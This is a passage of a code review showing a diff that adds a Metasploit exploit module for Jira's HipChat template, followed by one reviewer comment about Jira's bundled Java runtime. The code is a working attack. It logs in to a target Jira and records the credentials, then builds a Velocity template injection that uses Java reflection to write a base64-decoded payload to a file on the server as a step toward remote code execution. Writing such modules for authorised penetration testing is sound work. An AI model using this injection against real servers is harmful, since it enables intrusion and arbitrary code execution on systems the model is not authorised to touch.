modules/exploits/unix/webapp/jira_hipchat_template.rb

```diff
@@ -0,0 +1,439 @@
+      private_data: opts[:password],
+      origin_type: :service,
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      last_attempted_at: Time.now
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
+  # Returns a valid login cookie.
+  #
+  # @return [String]
+  def do_login
+    cookie = ''
+
+    prerequisites = get_login_prerequisites
+    xsrf          = prerequisites['atlassian.xsrf.token']
+    sid           = prerequisites['JSESSIONID']
+    uri           = normalize_uri(target_uri.path, 'rest', 'gadget', '1.0', 'login')
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => uri,
+      'headers'   => { 'X-Requested-With' => 'XMLHttpRequest' },
+      'cookie'    => "atlassian.xsrf.token=#{xsrf}; JSESSIONID=#{sid}",
+      'vars_post' => {
+        'os_username' => jira_username,
+        'os_password' => jira_password,
+        'os_captcha'  => '' # Not beatable yet
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while trying to login')
+    end
+
+    json = res.get_json_document
+
+    if json.empty?
+      fail_with(Failure::Unknown, 'Server returned a non-JSon response while trying to login.')
+    end
+
+    if json['loginSucceeded']
+      cookie = res.get_cookies
+    elsif !json['loginSucceeded'] && json['captchaFailure']
+      fail_with(Failure::NoAccess, "#{jira_username} is protected by captcha. Please try a different account.")
+    elsif !json['loginSucceeded']
+      fail_with(Failure::NoAccess, 'Incorrect username or password')
+    end
+
+    report_cred(
+      user: jira_username,
+      password: jira_password
+    )
+
+    cookie
+  end
+
+
+  # Returns login prerequisites
+  #
+  # @return [Hash]
+  def get_login_prerequisites
+    uri = normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa')
+    res = send_request_cgi({ 'uri' => uri })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while getting login prerequisites')
+    end
+
+    get_cookie_as_hash(res.get_cookies)
+  end
+
+
+  # Returns Java code that can be used to inject to the template in order to write a file.
+  #
+  # @note This Java code is not able to properly close the file handle. So after using it, you should use #get_dup_file_code,
+  #       and then execute the new file instead.
+  #
+  # @param fname [String] File to write to.
+  # @param p [String] Payload
+  # @return [String]
+  def get_write_file_code(fname, p)
+    b64 = Rex::Text.encode_base64(p)
+    %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) |
```

Comment:
It looks like it does have its own JRE: https://confluence.atlassian.com/jira/how-to-use-system-jre-instead-of-embedded-jre-303661422.html